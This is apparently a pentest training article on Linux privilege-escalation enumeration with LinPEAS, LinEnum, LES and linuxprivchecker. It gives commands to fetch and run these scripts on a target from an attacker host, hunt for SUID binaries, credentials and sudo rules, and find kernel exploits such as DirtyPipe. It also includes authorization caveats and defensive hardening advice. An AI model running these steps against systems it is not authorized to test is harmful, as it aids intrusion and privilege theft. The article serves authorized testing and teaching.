Linux Privilege Escalation: LinPEAS, LinEnum & LES Enumeration

In the post-exploitation phase, after gaining an initial foothold on a Linux system, you rarely land with root privileges already in hand. Linux Privilege Escalation — climbing from a low-privileged user to root — is the heart of every internal penetration test. Before reaching the exploit, you need thorough enumeration: what is running, what you can write, which SUID binaries exist, and which cron jobs execute. This article covers the four most important tools for that phase: LinPEAS, LinEnum, LES (Linux Exploit Suggester), and linuxprivchecker.

Legal & ethical scope: The tools and techniques described here are intended exclusively for authorized penetration testing, CTF and lab environments (HackTheBox, TryHackMe, VulnHub, DVWA, Metasploitable), and your own home labs. Running them against systems without written authorization may violate the Computer Fraud and Abuse Act (US), the Computer Misuse Act (UK), the Budapest Convention on Cybercrime, and equivalent national statutes.

What Linux Privilege Escalation is

The term Privilege Escalation (PrivEsc) refers to exploiting a vulnerability, design flaw, or misconfiguration to gain privileges higher than those assigned to you. On Linux it splits into two categories:

• Vertical PrivEsc: from an unprivileged user → root (or from a service account → root).
• Horizontal PrivEsc: from one user to another at the same level — for example, reading another user’s home directory.

In MITRE ATT&CK this maps to the tactic TA0004 — Privilege Escalation. Before any exploit, step zero is enumeration — and that is where the tools below make all the difference.

Why automated enumeration scripts are essential

• Speed: a PrivEsc check that takes 30+ minutes manually runs in under 2 minutes.
• Better coverage: hundreds of checks (SUID, capabilities, writable paths, kernel exploits, cron jobs, sudoers) without missing anything.
• Repeatability: the same results on the same target — essential for the report.
• Tradecraft: most scripts are portable Bash or Python — they run inside minimalist environments with no compiler or external dependencies.

1. LinPEAS — Linux Privilege Escalation Awesome Script

LinPEAS (part of the PEASS-ng project by Carlos Polop) is today the de facto standard for Linux PrivEsc enumeration. It is a monolithic Bash script that runs hundreds of checks and returns colorized output (red = high probability of PrivEsc, yellow = worth investigating).

Install and run (lab)

# On the attacker box (Kali), download:
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

# Serve to the lab victim via a simple HTTP server:
python3 -m http.server 8000   # on the attacker

# On the target lab VM:
curl http://10.10.10.50:8000/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas_report.txt

Useful flags

-a	All checks (more aggressive, slower)
-s	Stealth mode — less noise
-q	Quiet mode (no banner)
-o sysinfo,procs	Run only specific check categories
-P pass	Password to use for sudo brute attempts

What LinPEAS looks for

• Kernel version and known exploits
• Sudo rules and mapping to GTFOBins
• SUID/SGID binaries and capabilities
• Writable paths inside $PATH
• Cron jobs and systemd timers
• Credentials inside configuration files, history files, and the environment
• Docker socket and container escape vectors
• NFS exports with no_root_squash

2. LinEnum — clean system enumeration

LinEnum (rebootuser) is a classic Bash script — smaller than LinPEAS, without colorized output, but extremely fast and reliable. It produces a structured report that is ideal as a pentest report appendix.

# On the lab VM:
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh

# Basic scan:
./LinEnum.sh

# Thorough scan + keyword search + save to file:
./LinEnum.sh -t -k password -r linenum_report.txt

-t	Thorough (additional checks)
-k <keyword>	Keyword search inside files
-r <file>	Save the report
-e <path>	Export directory for exportable files
-h	Help menu

When to choose LinEnum over LinPEAS: in restricted shells (no color codes), on very small VM memory budgets, or when you want clean output for fast grep.

3. Linux Exploit Suggester (LES)

LES (the-Z-Labs) focuses on a different question: “given this kernel, which known CVEs apply to it?” It reads uname -r and matches against a database of kernel exploits.

# On the lab VM:
wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

# Example output:
# [+] [CVE-2022-0847] DirtyPipe
#     Details: https://dirtypipe.cm4all.com/
#     Tags: ubuntu=20.04|22.04
#     Download URL: https://haxx.in/files/dirtypipez.c

Important: kernel exploits are frequently unstable and can crash the target. On any production-like engagement, test on a VM clone first, and consider whether a kernel exploit is actually needed or whether there is a more stable path through misconfigurations (sudo, SUID, cron).

4. linuxprivchecker

linuxprivchecker is a Python implementation of similar logic to LinEnum. Advantage: it runs on systems that ship Python but lack a full Bash environment with all expected utilities. A good fallback when LinPEAS is blocked by EDR or restricted shells.

wget https://raw.githubusercontent.com/linted/linuxprivchecker/master/linuxprivchecker.py
python3 linuxprivchecker.py extended | tee privchecker.log

# Targeted check categories:
python3 linuxprivchecker.py system
python3 linuxprivchecker.py suid_sgid
python3 linuxprivchecker.py cron_jobs
python3 linuxprivchecker.py world_writable

Manual checks — the baseline every pentester should know

The scripts are excellent, but every pentester should be able to perform the following by hand:

# Sudo rules for the current user:
sudo -l

# SUID binaries:
find / -perm -4000 -type f 2>/dev/null

# SGID binaries:
find / -perm -2000 -type f 2>/dev/null

# World-writable directories:
find / -writable -type d 2>/dev/null

# Capabilities:
getcap -r / 2>/dev/null

# Cron jobs:
cat /etc/crontab
ls -la /etc/cron.* 2>/dev/null

# Kernel & OS:
uname -a
cat /etc/os-release

# Listening ports (potential lateral movement):
ss -tulnp 2>/dev/null || netstat -tulnp 2>/dev/null

# Non-root users with UID 0:
awk -F: '$3==0 {print $1}' /etc/passwd

For every SUID binary or sudo entry you find, consult GTFOBins — the largest database of legitimate binaries that can be abused for PrivEsc.

Common mistakes

• Running scripts from /tmp with noexec: Many hardened systems mount /tmp as noexec. Use bash linpeas.sh or pick a writable + executable path such as /dev/shm.
• No verification of findings: Never trust the output blindly. Manually verify every candidate path before reporting it.
• Ignoring the blue team: These scripts leave a huge footprint in auditd and EDR logs. On red team engagements, weigh the benefit against the detection risk.
• Stale versions: Always download the latest release — new CVEs and techniques are added monthly.

Defensive / Blue team perspective

• auditd rules: Monitor execution of unusual binaries (Bash scripts run from /tmp, /dev/shm).
• OSSEC / Wazuh: Alert on repeated execution of find / -perm, getcap, sudo -l by unprivileged users.
• Hardening:
  • Mount /tmp and /var/tmp with noexec,nosuid,nodev.
  • Minimize SUID binaries — strip the ones you do not need.
  • Avoid NOPASSWD sudoers entries for binaries that appear in GTFOBins.
  • Patch management — running a kernel that is six months out of date is a real exposure.
• YARA rules: Filesystem detection of LinPEAS and LinEnum signatures.

Best practices for pentesters

• Always work inside a documented scope with written authorization.
• Save the full output of every scan — essential for the report.
• Combine at least two tools (for example, LinPEAS + LES) for cross-validation.
• In the report, explain why the finding is a risk and how to fix it — not just “SUID found”.
• Respect the nature of target systems — avoid kernel exploits in production when a more stable path exists.

Summary

LinPEAS, LinEnum, LES, and linuxprivchecker cover different angles of the same problem: automated Linux PrivEsc enumeration. They do not replace a deep understanding of Linux internals — they complement it. On every internal pentest or CTF lab, the combined use of these tools alongside manual checks is the fastest route to a complete PrivEsc findings report.

Next steps

• Linux Privilege Escalation Tools — Part 2
• All Information Gathering articles
• External references: MITRE ATT&CK TA0004, GTFOBins, PEASS-ng on GitHub.

For deeper training in offensive security, see the courses at Audax Cybersecurity Academy.